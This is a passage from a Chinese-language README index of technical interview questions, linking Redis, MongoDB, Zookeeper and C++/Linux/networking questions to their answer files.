存储过程与触发器的区别](09.MySQL篇/9.1.8%20%E5%AD%98%E5%82%A8%E8%BF%87%E7%A8%8B%E4%B8%8E%E8%A7%A6%E5%8F%91%E5%99%A8%E7%9A%84%E5%8C%BA%E5%88%AB.md) <br> <h3 id="10">redis篇</h3> --- ##### [10.1.0 使用Redis有哪些好处?](10.Redis篇/10.1.0%20%E4%BD%BF%E7%94%A8Redis%E6%9C%89%E5%93%AA%E4%BA%9B%E5%A5%BD%E5%A4%84%EF%BC%9F.md) ##### [10.1.1 redis相比memcached有哪些优势?](10.Redis篇/10.1.1%20redis%E7%9B%B8%E6%AF%94memcached%E6%9C%89%E5%93%AA%E4%BA%9B%E4%BC%98%E5%8A%BF%EF%BC%9F.md) ##### [10.1.2 redis常见性能问题和解决方案](10.Redis篇/10.1.2%20redis%E5%B8%B8%E8%A7%81%E6%80%A7%E8%83%BD%E9%97%AE%E9%A2%98%E5%92%8C%E8%A7%A3%E5%86%B3%E6%96%B9%E6%A1%88.md) ##### [10.1.3 MySQL里有2000w数据,redis中只存20w的数据,如何保证redis中的数据都是热点数据](10.Redis篇/10.1.3%20MySQL%E9%87%8C%E6%9C%892000w%E6%95%B0%E6%8D%AE%EF%BC%8Credis%E4%B8%AD%E5%8F%AA%E5%AD%9820w%E7%9A%84%E6%95%B0%E6%8D%AE%EF%BC%8C%E5%A6%82%E4%BD%95%E4%BF%9D%E8%AF%81redis%E4%B8%AD%E7%9A%84%E6%95%B0%E6%8D%AE%E9%83%BD%E6%98%AF%E7%83%AD%E7%82%B9%E6%95%B0%E6%8D%AE.md) ##### [10.1.4 Memcache与Redis的区别都有哪些?](10.Redis篇/10.1.4%20Memcache%E4%B8%8ERedis%E7%9A%84%E5%8C%BA%E5%88%AB%E9%83%BD%E6%9C%89%E5%93%AA%E4%BA%9B%EF%BC%9F.md) ##### [10.1.5 Redis 常见的性能问题都有哪些?如何解决?](10.Redis篇/10.1.5%20Redis%20%E5%B8%B8%E8%A7%81%E7%9A%84%E6%80%A7%E8%83%BD%E9%97%AE%E9%A2%98%E9%83%BD%E6%9C%89%E5%93%AA%E4%BA%9B%EF%BC%9F%E5%A6%82%E4%BD%95%E8%A7%A3%E5%86%B3%EF%BC%9F.md) ##### 10.1.6 redis 最适合的场景 ##### [10.1.7 Redis的同步机制了解么?](10.Redis篇/10.1.7%20Redis%E7%9A%84%E5%90%8C%E6%AD%A5%E6%9C%BA%E5%88%B6%E4%BA%86%E8%A7%A3%E4%B9%88%EF%BC%9F.md) ##### [10.1.8 是否使用过Redis集群,集群的原理是什么?](10.Redis篇/10.1.8%20%E6%98%AF%E5%90%A6%E4%BD%BF%E7%94%A8%E8%BF%87Redis%E9%9B%86%E7%BE%A4%EF%BC%8C%E9%9B%86%E7%BE%A4%E7%9A%84%E5%8E%9F%E7%90%86%E6%98%AF%E4%BB%80%E4%B9%88%EF%BC%9F.md) ##### 10.1.9 redis集群如何保证一致性? <br> <h3 id="11">MongoDB篇</h3> --- ##### [11.1.0 什么是MongoDB?](11.MongoDB篇/11.1.0%20%E4%BB%80%E4%B9%88%E6%98%AFMongoDB%EF%BC%9F.md) ##### [11.1.1 MongoDB是由哪种语言写的?](11.MongoDB篇/11.1.1%20MongoDB%E6%98%AF%E7%94%B1%E5%93%AA%E7%A7%8D%E8%AF%AD%E8%A8%80%E5%86%99%E7%9A%84%EF%BC%9F.md) ##### [11.1.2 MongoDB的优势有哪些?](11.MongoDB篇/11.1.2%20MongoDB%E7%9A%84%E4%BC%98%E5%8A%BF%E6%9C%89%E5%93%AA%E4%BA%9B%EF%BC%9F.md) ##### [11.1.3 什么是数据库?](11.MongoDB篇/11.1.3%20%E4%BB%80%E4%B9%88%E6%98%AF%E6%95%B0%E6%8D%AE%E5%BA%93%EF%BC%9F.md) ##### [11.1.4 什么是集合?](11.MongoDB篇/11.1.4%20%E4%BB%80%E4%B9%88%E6%98%AF%E9%9B%86%E5%90%88%EF%BC%9F.md) ##### [11.1.5 什么是文档?](11.MongoDB篇/11.1.5%20%E4%BB%80%E4%B9%88%E6%98%AF%E6%96%87%E6%A1%A3%EF%BC%9F.md) ##### [11.1.6 MongoDB和关系型数据库术语对比图](11.MongoDB篇/11.1.6%20MongoDB%E5%92%8C%E5%85%B3%E7%B3%BB%E5%9E%8B%E6%95%B0%E6%8D%AE%E5%BA%93%E6%9C%AF%E8%AF%AD%E5%AF%B9%E6%AF%94%E5%9B%BE.md) ##### [11.1.7 什么是“mongod”?](11.MongoDB篇/11.1.7%20%E4%BB%80%E4%B9%88%E6%98%AF%E2%80%9Cmongod%E2%80%9D%EF%BC%9F.md) ##### [11.1.8 “mongod”参数有什么?](11.MongoDB篇/11.1.8%20%E2%80%9Cmongod%E2%80%9D%E5%8F%82%E6%95%B0%E6%9C%89%E4%BB%80%E4%B9%88%EF%BC%9F.md) ##### [11.1.9 什么是“mongo”?](11.MongoDB篇/11.1.9%20%E4%BB%80%E4%B9%88%E6%98%AF%E2%80%9Cmongo%E2%80%9D%EF%BC%9F.md) ##### [11.2.0 MongoDB哪个命令可以切换数据库?](11.MongoDB篇/11.2.0%20MongoDB%E5%93%AA%E4%B8%AA%E5%91%BD%E4%BB%A4%E5%8F%AF%E4%BB%A5%E5%88%87%E6%8D%A2%E6%95%B0%E6%8D%AE%E5%BA%93%EF%BC%9F.md) ##### [11.2.1 什么是非关系型数据库?](11.MongoDB篇/11.2.1%20%E4%BB%80%E4%B9%88%E6%98%AF%E9%9D%9E%E5%85%B3%E7%B3%BB%E5%9E%8B%E6%95%B0%E6%8D%AE%E5%BA%93%EF%BC%9F.md) ##### [11.2.2 非关系型数据库有哪些类型?](11.MongoDB篇/11.2.2%20%E9%9D%9E%E5%85%B3%E7%B3%BB%E5%9E%8B%E6%95%B0%E6%8D%AE%E5%BA%93%E6%9C%89%E5%93%AA%E4%BA%9B%E7%B1%BB%E5%9E%8B%EF%BC%9F.md) ##### [11.2.3 为什么用MongoDB?](11.MongoDB篇/11.2.3%20%E4%B8%BA%E4%BB%80%E4%B9%88%E7%94%A8MOngoDB%EF%BC%9F.md) ##### [11.2.4 在哪些场景使用MongoDB?](11.MongoDB篇/11.2.4%20%E5%9C%A8%E5%93%AA%E4%BA%9B%E5%9C%BA%E6%99%AF%E4%BD%BF%E7%94%A8MongoDB%EF%BC%9F.md) ##### 11.2.5 MongoDB中的命名空间是什么意思? ##### 11.2.6 哪些语言支持MongoDB? ##### [11.2.7 在MongoDB中如何创建一个新的数据库?](11.MongoDB篇/11.2.7%20%E5%9C%A8MongoDB%E4%B8%AD%E5%A6%82%E4%BD%95%E5%88%9B%E5%BB%BA%E4%B8%80%E4%B8%AA%E6%96%B0%E7%9A%84%E6%95%B0%E6%8D%AE%E5%BA%93%EF%BC%9F.md) ##### [11.2.8 在MongoDB中如何查看数据库列表?](11.MongoDB篇/11.2.8%20%E5%9C%A8MongoDB%E4%B8%AD%E5%A6%82%E4%BD%95%E6%9F%A5%E7%9C%8B%E6%95%B0%E6%8D%AE%E5%BA%93%E5%88%97%E8%A1%A8%EF%BC%9F.md) ##### [11.2.9 MongoDB中的分片是什么意思?](11.MongoDB篇/11.2.9%20MongoDB%E4%B8%AD%E7%9A%84%E5%88%86%E7%89%87%E6%98%AF%E4%BB%80%E4%B9%88%E6%84%8F%E6%80%9D%EF%BC%9F.md) ##### [11.3.0 如何查看使用MongoDB的连接?](11.MongoDB篇/11.3.0%20%E5%A6%82%E4%BD%95%E6%9F%A5%E7%9C%8B%E4%BD%BF%E7%94%A8MongoDB%E7%9A%84%E8%BF%9E%E6%8E%A5%EF%BC%9F.md) ##### [11.3.1 什么是复制?](11.MongoDB篇/11.3.1%20%E4%BB%80%E4%B9%88%E6%98%AF%E5%A4%8D%E5%88%B6%EF%BC%9F.md) ##### [11.3.2 在MongoDB中如何在集合中插入一个文档?](11.MongoDB篇/11.3.2%20%E5%9C%A8MongoDB%E4%B8%AD%E5%A6%82%E4%BD%95%E5%9C%A8%E9%9B%86%E5%90%88%E4%B8%AD%E6%8F%92%E5%85%A5%E4%B8%80%E4%B8%AA%E6%96%87%E6%A1%A3%EF%BC%9F.md) ##### [11.3.3 在MongoDB中如何除去一个数据库?](11.MongoDB篇/11.3.3%20%E5%9C%A8MongoDB%E4%B8%AD%E5%A6%82%E4%BD%95%E9%99%A4%E5%8E%BB%E4%B8%80%E4%B8%AA%E6%95%B0%E6%8D%AE%E5%BA%93%EF%BC%9F.md) ##### [11.3.4 在MongoDB中如何创建一个集合?](11.MongoDB篇/11.3.4%20%E5%9C%A8MongoDB%E4%B8%AD%E5%A6%82%E4%BD%95%E5%88%9B%E5%BB%BA%E4%B8%80%E4%B8%AA%E9%9B%86%E5%90%88%EF%BC%9F.md) ##### [11.3.5 在MongoDB中如何查看一个已经创建的集合?](11.MongoDB篇/11.3.5%20%E5%9C%A8MongoDB%E4%B8%AD%E5%A6%82%E4%BD%95%E6%9F%A5%E7%9C%8B%E4%B8%80%E4%B8%AA%E5%B7%B2%E7%BB%8F%E5%88%9B%E5%BB%BA%E7%9A%84%E9%9B%86%E5%90%88%EF%BC%9F.md) ##### [11.3.6 在MongoDB中如何删除一个集合?](11.MongoDB篇/11.3.6%20%E5%9C%A8MongoDB%E4%B8%AD%E5%A6%82%E4%BD%95%E5%88%A0%E9%99%A4%E4%B8%80%E4%B8%AA%E9%9B%86%E5%90%88%EF%BC%9F.md) ##### [11.3.7 为什么要在MongoDB中使用分析器?](11.MongoDB篇/11.3.7%20%E4%B8%BA%E4%BB%80%E4%B9%88%E8%A6%81%E5%9C%A8MongoDB%E4%B8%AD%E4%BD%BF%E7%94%A8%E5%88%86%E6%9E%90%E5%99%A8%EF%BC%9F.md) ##### [11.3.8 MongoDB支持主键外键关系吗?](11.MongoDB篇/11.3.8%20MongoDB%E6%94%AF%E6%8C%81%E4%B8%BB%E9%94%AE%E5%A4%96%E9%94%AE%E5%85%B3%E7%B3%BB%E5%90%97%EF%BC%9F.md) ##### [11.3.9 MongoDB支持哪些数据类型?](11.MongoDB篇/11.3.9%20MongoDB%E6%94%AF%E6%8C%81%E5%93%AA%E4%BA%9B%E6%95%B0%E6%8D%AE%E7%B1%BB%E5%9E%8B%EF%BC%9F.md) ##### 11.4.0 为什么要在MongoDB中用"Code"数据类型? ##### 11.4.1 为什么要在MongoDB中用"Regular Expression"数据类型? ##### 11.4.2 为什么在MongoDB中使用"Object ID"数据类型? ##### [11.4.3 如何在集合中插入一个文档?](11.MongoDB篇/11.4.3%20%E5%A6%82%E4%BD%95%E5%9C%A8%E9%9B%86%E5%90%88%E4%B8%AD%E6%8F%92%E5%85%A5%E4%B8%80%E4%B8%AA%E6%96%87%E6%A1%A3%EF%BC%9F.md) ##### [11.4.4 “ObjectID”有哪些部分组成?](11.MongoDB篇/11.4.4%20%E2%80%9CObjectID%E2%80%9D%E6%9C%89%E5%93%AA%E4%BA%9B%E9%83%A8%E5%88%86%E7%BB%84%E6%88%90%EF%BC%9F.md) ##### [11.4.5 在MongoDB中什么是索引?](11.MongoDB篇/11.4.5%20%E5%9C%A8MongoDb%E4%B8%AD%E4%BB%80%E4%B9%88%E6%98%AF%E7%B4%A2%E5%BC%95%EF%BC%9F.md) ##### [11.4.6 如何添加索引?](11.MongoDB篇/11.4.6%20%E5%A6%82%E4%BD%95%E6%B7%BB%E5%8A%A0%E7%B4%A2%E5%BC%95%EF%BC%9F.md) ##### [11.4.7 MongoDB有哪些可替代产品?](11.MongoDB篇/11.4.7%20MongoDB%E6%9C%89%E5%93%AA%E4%BA%9B%E5%8F%AF%E6%9B%BF%E4%BB%A3%E4%BA%A7%E5%93%81%EF%BC%9F.md) ##### [11.4.8 如何查询集合中的文档?](11.MongoDB篇/11.4.8%20%E5%A6%82%E4%BD%95%E6%9F%A5%E8%AF%A2%E9%9B%86%E5%90%88%E4%B8%AD%E7%9A%84%E6%96%87%E6%A1%A3%EF%BC%9F.md) ##### [11.4.9 用什么方法可以格式化输出结果?](11.MongoDB篇/11.4.9%20%E7%94%A8%E4%BB%80%E4%B9%88%E6%96%B9%E6%B3%95%E5%8F%AF%E4%BB%A5%E6%A0%BC%E5%BC%8F%E5%8C%96%E8%BE%93%E5%87%BA%E7%BB%93%E6%9E%9C%EF%BC%9F.md) ##### 11.5.0 如何使用"AND"或"OR"条件循环查询集合中的文档? ##### [11.5.1 在MongoDB中如何更新数据?](11.MongoDB篇/11.5.1%20%E5%9C%A8MongoDB%E4%B8%AD%E5%A6%82%E4%BD%95%E6%9B%B4%E6%96%B0%E6%95%B0%E6%8D%AE%EF%BC%9F.md) ##### [11.5.2 如何删除文档?](11.MongoDB篇/11.5.2%20%E5%A6%82%E4%BD%95%E5%88%A0%E9%99%A4%E6%96%87%E6%A1%A3%EF%BC%9F.md) ##### [11.5.3 在MongoDB中如何排序?](11.MongoDB篇/11.5.3%20%E5%9C%A8MongoDB%E4%B8%AD%E5%A6%82%E4%BD%95%E6%8E%92%E5%BA%8F%EF%BC%9F.md) ##### [11.5.4 什么是聚合?](11.MongoDB篇/11.5.4%20%E4%BB%80%E4%B9%88%E6%98%AF%E8%81%9A%E5%90%88%EF%BC%9F.md) ##### [11.5.5 在MongoDB中什么是副本集?](11.MongoDB篇/11.5.5%20%E5%9C%A8MongoDB%E4%B8%AD%E4%BB%80%E4%B9%88%E6%98%AF%E5%89%AF%E6%9C%AC%E9%9B%86%EF%BC%9F.md) ##### 11.5.6 Mongodb存储特性与内部原理? <br> <h3 id="12">Zookeeper篇</h3> --- ##### [12.1.0 zookeeper是什么?](12.Zookeeper篇/12.1.0%20zookeeper%E6%98%AF%E4%BB%80%E4%B9%88%EF%BC%9F.md) ##### [12.1.1 zookeeper提供了什么?](12.Zookeeper篇/12.1.1%20zookeeper%E6%8F%90%E4%BE%9B%E4%BA%86%E4%BB%80%E4%B9%88%EF%BC%9F.md) ##### [12.1.2 zookeeper文件系统](12.Zookeeper篇/12.1.2%20zookeeper%E6%96%87%E4%BB%B6%E7%B3%BB%E7%BB%9F.md) ##### [12.1.3 zookeeper的四种类型的znode](https://github.com/0voice/interview_internal_reference/blob/master/12.1.3%20zookeeper%E7%9A%84%E5%9B%9B%E7%A7%8D%E7%B1%BB%E5%9E%8B%E7%9A%84znode.md) ##### [12.1.4 zookeeper通知机制](12.Zookeeper篇/12.1.4%20zookeeper%E9%80%9A%E7%9F%A5%E6%9C%BA%E5%88%B6.md) ##### [12.1.5 zookeeper有哪些应用场景?](12.Zookeeper篇/12.1.5%20zookeeper%E6%9C%89%E5%93%AA%E4%BA%9B%E5%BA%94%E7%94%A8%E5%9C%BA%E6%99%AF%EF%BC%9F.md) ##### [12.1.6 zk的命名服务](12.Zookeeper篇/12.1.6%20zk%E7%9A%84%E5%91%BD%E5%90%8D%E6%9C%8D%E5%8A%A1.md) ##### [12.1.7 zk的配置管理服务](12.Zookeeper篇/12.1.7%20zk%E7%9A%84%E9%85%8D%E7%BD%AE%E7%AE%A1%E7%90%86%E6%9C%8D%E5%8A%A1.md) ##### [12.1.8 zk的集群管理](12.Zookeeper篇/12.1.8%20zk%E7%9A%84%E9%9B%86%E7%BE%A4%E7%AE%A1%E7%90%86.md) ##### [12.1.9 zk的分布式锁](12.Zookeeper篇/12.1.9%20zk%E7%9A%84%E5%88%86%E5%B8%83%E5%BC%8F%E9%94%81.md) ##### [12.2.0 zk队列管理](12.Zookeeper篇/12.2.0%20zk%E9%98%9F%E5%88%97%E7%AE%A1%E7%90%86.md) ##### [12.2.1 zk数据复制](12.Zookeeper篇/12.2.1%20zk%E6%95%B0%E6%8D%AE%E5%A4%8D%E5%88%B6.md) ##### [12.2.2 zk的工作原理](12.Zookeeper篇/12.2.2%20zk%E7%9A%84%E5%B7%A5%E4%BD%9C%E5%8E%9F%E7%90%86.md) ##### [12.2.3 zk是如何保证事物的顺序一致性](12.Zookeeper篇/12.2.3%20zk%E6%98%AF%E5%A6%82%E4%BD%95%E4%BF%9D%E8%AF%81%E4%BA%8B%E7%89%A9%E7%9A%84%E9%A1%BA%E5%BA%8F%E4%B8%80%E8%87%B4%E6%80%A7.md) ##### [12.2.4 zk集群下server工作状态](12.Zookeeper篇/12.2.4%20zk%E9%9B%86%E7%BE%A4%E4%B8%8Bserver%E5%B7%A5%E4%BD%9C%E7%8A%B6%E6%80%81.md) ##### [12.2.5 zk是如何选举Leader的?](12.Zookeeper篇/12.2.5%20zk%E6%98%AF%E5%A6%82%E4%BD%95%E9%80%89%E4%B8%BELeader%E7%9A%84%EF%BC%9F.md) ##### [12.2.6 zk同步流程](12.Zookeeper篇/12.2.6%20zk%E5%90%8C%E6%AD%A5%E6%B5%81%E7%A8%8B.md) ##### [12.2.7 分布式通知和协调](12.Zookeeper篇/12.2.7%20%E5%88%86%E5%B8%83%E5%BC%8F%E9%80%9A%E7%9F%A5%E5%92%8C%E5%8D%8F%E8%B0%83.md) ##### [12.2.8 zk的session机制](12.Zookeeper篇/12.2.8%20zk的session机制.md) <br> <h3 id="13">其他中大厂700道精选面试题</h3> --- ##### [13.1.0 多重继承如何解决?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#307-%E5%A4%9A%E9%87%8D%E7%BB%A7%E6%89%BF%E5%A6%82%E4%BD%95%E8%A7%A3%E5%86%B3) ##### [13.1.1 派生类与虚函数概述](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#308-%E6%B4%BE%E7%94%9F%E7%B1%BB%E4%B8%8E%E8%99%9A%E5%87%BD%E6%95%B0%E6%A6%82%E8%BF%B0) ##### [13.1.2 为什么析构函数要定义为虚函数?哪些函数不能是虚函数?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#309-%E4%B8%BA%E4%BB%80%E4%B9%88%E6%9E%90%E6%9E%84%E5%87%BD%E6%95%B0%E8%A6%81%E5%AE%9A%E4%B9%89%E4%B8%BA%E8%99%9A%E5%87%BD%E6%95%B0%E5%93%AA%E4%BA%9B%E5%87%BD%E6%95%B0%E4%B8%8D%E8%83%BD%E6%98%AF%E8%99%9A%E5%87%BD%E6%95%B0) ##### [13.1.3 析构函数可以抛出异常吗?为什么不能抛出异常?除了资源泄露,还有其他需考虑的因素吗?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#310-%E6%9E%90%E6%9E%84%E5%87%BD%E6%95%B0%E5%8F%AF%E4%BB%A5%E6%8A%9B%E5%87%BA%E5%BC%82%E5%B8%B8%E5%90%97%E4%B8%BA%E4%BB%80%E4%B9%88%E4%B8%8D%E8%83%BD%E6%8A%9B%E5%87%BA%E5%BC%82%E5%B8%B8%E9%99%A4%E4%BA%86%E8%B5%84%E6%BA%90%E6%B3%84%E9%9C%B2%E8%BF%98%E6%9C%89%E5%85%B6%E4%BB%96%E9%9C%80%E8%80%83%E8%99%91%E7%9A%84%E5%9B%A0%E7%B4%A0%E5%90%97) ##### [13.1.4 动态链接库的两种使用方法及特点?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#311%E5%8A%A8%E6%80%81%E9%93%BE%E6%8E%A5%E5%BA%93%E7%9A%84%E4%B8%A4%E7%A7%8D%E4%BD%BF%E7%94%A8%E6%96%B9%E6%B3%95%E5%8F%8A%E7%89%B9%E7%82%B9) ##### [13.1.5 STL各类容器(3个顺序+4个关联+1个无序关联)的实现原理及使用情形](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#312-stl%E5%90%84%E7%B1%BB%E5%AE%B9%E5%99%A83%E4%B8%AA%E9%A1%BA%E5%BA%8F4%E4%B8%AA%E5%85%B3%E8%81%941%E4%B8%AA%E6%97%A0%E5%BA%8F%E5%85%B3%E8%81%94%E7%9A%84%E5%AE%9E%E7%8E%B0%E5%8E%9F%E7%90%86%E5%8F%8A%E4%BD%BF%E7%94%A8%E6%83%85%E5%BD%A2) ##### [13.1.6 什么是STL?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#313%E4%BB%80%E4%B9%88%E6%98%AFstl) ##### [13.1.7 什么是智能指针?底层实现?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#314-%E4%BB%80%E4%B9%88%E6%98%AF%E6%99%BA%E8%83%BD%E6%8C%87%E9%92%88%E5%BA%95%E5%B1%82%E5%AE%9E%E7%8E%B0)) ##### [13.1.8 多进程与多线程之间的区别?(最好要了解透彻)](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#315-%E5%A4%9A%E8%BF%9B%E7%A8%8B%E4%B8%8E%E5%A4%9A%E7%BA%BF%E7%A8%8B%E4%B9%8B%E9%97%B4%E7%9A%84%E5%8C%BA%E5%88%AB%E6%9C%80%E5%A5%BD%E8%A6%81%E4%BA%86%E8%A7%A3%E9%80%8F%E5%BD%BB) ##### 13.1.9 [什么是进程池和线程池?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#316-%E4%BB%80%E4%B9%88%E6%98%AF%E8%BF%9B%E7%A8%8B%E6%B1%A0%E5%92%8C%E7%BA%BF%E7%A8%8B%E6%B1%A0) ##### [13.2.0 进程间的通信方式有哪些?如何实现的?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#317%E8%BF%9B%E7%A8%8B%E9%97%B4%E7%9A%84%E9%80%9A%E4%BF%A1%E6%96%B9%E5%BC%8F%E6%9C%89%E5%93%AA%E4%BA%9B%E5%A6%82%E4%BD%95%E5%AE%9E%E7%8E%B0%E7%9A%84) ##### [13.2.1 简述inux中的同步与异步机制?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#318-%E7%AE%80%E8%BF%B0inux%E4%B8%AD%E7%9A%84%E5%90%8C%E6%AD%A5%E4%B8%8E%E5%BC%82%E6%AD%A5%E6%9C%BA%E5%88%B6) ##### [13.2.2 简述阻塞与非阻塞?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#319%E7%AE%80%E8%BF%B0%E9%98%BB%E5%A1%9E%E4%B8%8E%E9%9D%9E%E9%98%BB%E5%A1%9E) ##### [13.2.3 简述Linux中的5种I/O模式?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#320%E7%AE%80%E8%BF%B0linux%E4%B8%AD%E7%9A%845%E7%A7%8Dio%E6%A8%A1%E5%BC%8F) ##### [13.2.4 什么是死锁?四个死锁的条件?避免死锁的方法?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#321-%E4%BB%80%E4%B9%88%E6%98%AF%E6%AD%BB%E9%94%81%E5%9B%9B%E4%B8%AA%E6%AD%BB%E9%94%81%E7%9A%84%E6%9D%A1%E4%BB%B6%E9%81%BF%E5%85%8D%E6%AD%BB%E9%94%81%E7%9A%84%E6%96%B9%E6%B3%95) ##### [13.2.5 Linux的任务调度机制是什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#322-linux%E7%9A%84%E4%BB%BB%E5%8A%A1%E8%B0%83%E5%BA%A6%E6%9C%BA%E5%88%B6%E6%98%AF%E4%BB%80%E4%B9%88) ##### [13.2.6 标准库函数与系统调用的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#323%E6%A0%87%E5%87%86%E5%BA%93%E5%87%BD%E6%95%B0%E4%B8%8E%E7%B3%BB%E7%BB%9F%E8%B0%83%E7%94%A8%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [13.2.7 分别简述三次握手与四次挥手的过程?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#324-%E5%88%86%E5%88%AB%E7%AE%80%E8%BF%B0%E4%B8%89%E6%AC%A1%E6%8F%A1%E6%89%8B%E4%B8%8E%E5%9B%9B%E6%AC%A1%E6%8C%A5%E6%89%8B%E7%9A%84%E8%BF%87%E7%A8%8B) ##### [13.2.8 tcp和udp之间的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#325-tcp%E5%92%8Cudp%E4%B9%8B%E9%97%B4%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [13.2.9 epoll有哪些触发模式?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#327-epoll%E6%9C%89%E5%93%AA%E4%BA%9B%E8%A7%A6%E5%8F%91%E6%A8%A1%E5%BC%8F) ##### [13.3.1 C和C++的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#329c%E5%92%8Cc%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [13.3.2 C++中指针和引用的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#330c%E4%B8%AD%E6%8C%87%E9%92%88%E5%92%8C%E5%BC%95%E7%94%A8%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [13.3.3 结构体struct和共同体union(联合)的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#331%E7%BB%93%E6%9E%84%E4%BD%93struct%E5%92%8C%E5%85%B1%E5%90%8C%E4%BD%93union%E8%81%94%E5%90%88%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [13.3.4 #define和const的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#332define%E5%92%8Cconst%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [13.3.5 重载overload,覆盖(重写)override,隐藏(重定义)overwrite,这三者之间的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#333%E9%87%8D%E8%BD%BDoverload%E8%A6%86%E7%9B%96%E9%87%8D%E5%86%99override%E9%9A%90%E8%97%8F%E9%87%8D%E5%AE%9A%E4%B9%89overwrite%E8%BF%99%E4%B8%89%E8%80%85%E4%B9%8B%E9%97%B4%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [13.3.6 new、delete、malloc、free之间的关系](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#334newdeletemallocfree%E4%B9%8B%E9%97%B4%E7%9A%84%E5%85%B3%E7%B3%BB) ##### [13.3.7 delete和delete[]的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#335delete%E5%92%8Cdelete%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [13.3.8 虚函数、纯虚函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#336%E8%99%9A%E5%87%BD%E6%95%B0%E7%BA%AF%E8%99%9A%E5%87%BD%E6%95%B0) ##### [13.3.9 STL库用过吗?常见的STL容器有哪些?算法用过几个?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#337stl%E5%BA%93%E7%94%A8%E8%BF%87%E5%90%97%E5%B8%B8%E8%A7%81%E7%9A%84stl%E5%AE%B9%E5%99%A8%E6%9C%89%E5%93%AA%E4%BA%9B%E7%AE%97%E6%B3%95%E7%94%A8%E8%BF%87%E5%87%A0%E4%B8%AA) ##### [13.4.1 const知道吗?解释一下其作用](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#338const%E7%9F%A5%E9%81%93%E5%90%97%E8%A7%A3%E9%87%8A%E4%B8%80%E4%B8%8B%E5%85%B6%E4%BD%9C%E7%94%A8) ##### [13.4.2 虚函数是怎么实现的](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#339%E8%99%9A%E5%87%BD%E6%95%B0%E6%98%AF%E6%80%8E%E4%B9%88%E5%AE%9E%E7%8E%B0%E7%9A%84) ##### [13.4.3 堆和栈的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#340%E5%A0%86%E5%92%8C%E6%A0%88%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [13.4.4 关键字static的作用](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#341%E5%85%B3%E9%94%AE%E5%AD%97static%E7%9A%84%E4%BD%9C%E7%94%A8) ##### [13.4.5 STL中map和set的原理(关联式容器)](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#342stl%E4%B8%ADmap%E5%92%8Cset%E7%9A%84%E5%8E%9F%E7%90%86%E5%85%B3%E8%81%94%E5%BC%8F%E5%AE%B9%E5%99%A8) ##### [13.4.6 #include<file.h> #include "file.h" 的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#343includefileh-include-fileh-%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [13.4.7 什么是内存泄漏?面对内存泄漏和指针越界,你有哪些方法?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#344%E4%BB%80%E4%B9%88%E6%98%AF%E5%86%85%E5%AD%98%E6%B3%84%E6%BC%8F%E9%9D%A2%E5%AF%B9%E5%86%85%E5%AD%98%E6%B3%84%E6%BC%8F%E5%92%8C%E6%8C%87%E9%92%88%E8%B6%8A%E7%95%8C%E4%BD%A0%E6%9C%89%E5%93%AA%E4%BA%9B%E6%96%B9%E6%B3%95) ##### [13.4.8 定义和声明的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#345%E5%AE%9A%E4%B9%89%E5%92%8C%E5%A3%B0%E6%98%8E%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [13.4.9 C++文件编译与执行的四个阶段](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#346c%E6%96%87%E4%BB%B6%E7%BC%96%E8%AF%91%E4%B8%8E%E6%89%A7%E8%A1%8C%E7%9A%84%E5%9B%9B%E4%B8%AA%E9%98%B6%E6%AE%B5) ##### [13.5.1 STL中unordered_map和map的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#347stl%E4%B8%ADunordered_map%E5%92%8Cmap%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [13.5.2 C++的内存管理](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#348c%E7%9A%84%E5%86%85%E5%AD%98%E7%AE%A1%E7%90%86) ##### [13.5.3 构造函数为什么一般不定义为虚函数?而析构函数一般写成虚函数的原因 